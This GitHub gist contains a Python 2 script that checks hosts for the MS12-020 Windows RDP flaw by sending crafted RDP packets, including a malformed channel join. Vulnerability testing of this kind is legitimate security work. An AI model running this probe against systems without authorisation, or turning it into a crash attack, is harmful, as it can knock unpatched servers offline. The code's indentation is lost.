Skip to content

Instantly share code, notes, and snippets.

@DavidWittman
Created April 5, 2012 17:05
Show Gist options
  • Save DavidWittman/2312547 to your computer and use it in GitHub Desktop.
Save DavidWittman/2312547 to your computer and use it in GitHub Desktop.
MS12-020/CVE-2012-0002 Vulnerability Tester
#!/usr/bin/env python
"""
MS12-020/CVE-2012-0002 Vulnerability Tester
based on sleepya's version @ http://pastebin.com/Ks2PhKb4
"""
import socket
import struct
import sys
from binascii import hexlify, unhexlify
def exploit(host, port):
# See http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
connection_request = unhexlify(''.join([
"0300", # TPKT Header version 03, reserved 0
"0013", # Length
"0e", # X.224 Data TPDU length
"e0", # X.224 Type (Connection request)
"0000", # dst reference
"0000", # src reference
"00", # class and options
"01", # RDP Negotiation Message
"00", # flags
"0800", # RDP Negotiation Request Length
"00000000" # RDP Negotiation Request
]))
initial_pdu = unhexlify(''.join([
"03000065", # TPKT Header
"02f080", # Data TPDU, EOT
"7f655b", # Connect-Initial
"040101", # callingDomainSelector
"040101", # calledDomainSelector
"0101ff", # upwardFlag
"3019", # targetParams + size (25 bytes)
"020122", # maxChannelIds
"020120", # maxUserIds
"020100", # maxTokenIds
"020101", # numPriorities
"020100", # minThroughput
"020101", # maxHeight
"0202ffff", # maxMCSPDUSize
"020102", # protocolVersion
"3018", # minParams + size (24 bytes)
"020101", # maxChannelIds
"020101", # maxUserIds
"020101", # maxTokenIds
"020101", # numPriorities
"020100", # minThroughput
"020101", # maxHeight
"0201ff", # maxMCSPDUSize
"020102", # protocolVersion
"3019", # maxParams + size (25 bytes)
"0201ff", # maxChannelIds
"0201ff", # maxUserIds
"0201ff", # maxTokenIds
"020101", # numPriorities
"020100", # minThroughput
"020101", # maxHeight
"0202ffff", # maxMCSPDUSize
"020102", # protocolVersion
"0400", # userData
]))
user_request = unhexlify(''.join([
"0300", # header
"0008", # length
"02f080", # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT)
"28", # PER encoded PDU contents
]))
channel_join_request = unhexlify("0300000c02f08038")
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
skt.settimeout(10)
skt.connect((host, port))
skt.send(connection_request)
data = skt.recv(8192)
if data != unhexlify("0300000b06d00000123400") \
and data != unhexlify("030000130ed000001234000201080000000000"):
print "ERROR: This isn't RDP"
raise SystemExit(1)
skt.send(initial_pdu)
# Send attach user request
skt.send(user_request)
data = skt.recv(8192)
user1 = data[9:11]
# Send another attach user request
skt.send(user_request)
data = skt.recv(8192)
user2_int = int(hexlify(data[9:11]), base=16)
user2 = struct.pack('!H', user2_int + 1001)
# Send channel join request
skt.send(channel_join_request + user1 + user2)
data = skt.recv(8192)
if data[7:9] == "\x3e\x00":
""" 0x3e00 indicates a successful join; this service is vulnerable """
print "This device is vulnerable"
# Complete request to prevent BSOD
skt.send(channel_join_request + struct.pack('!H', user2_int) + user2)
data = skt.recv(8192)
else:
# Patched
print "This device is not vulnerable to MS12-020."
skt.close()
if __name__ == '__main__':
exploit(sys.argv[1], int(sys.argv[2]))
# vim: set expandtab ts=2 sw=2:
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment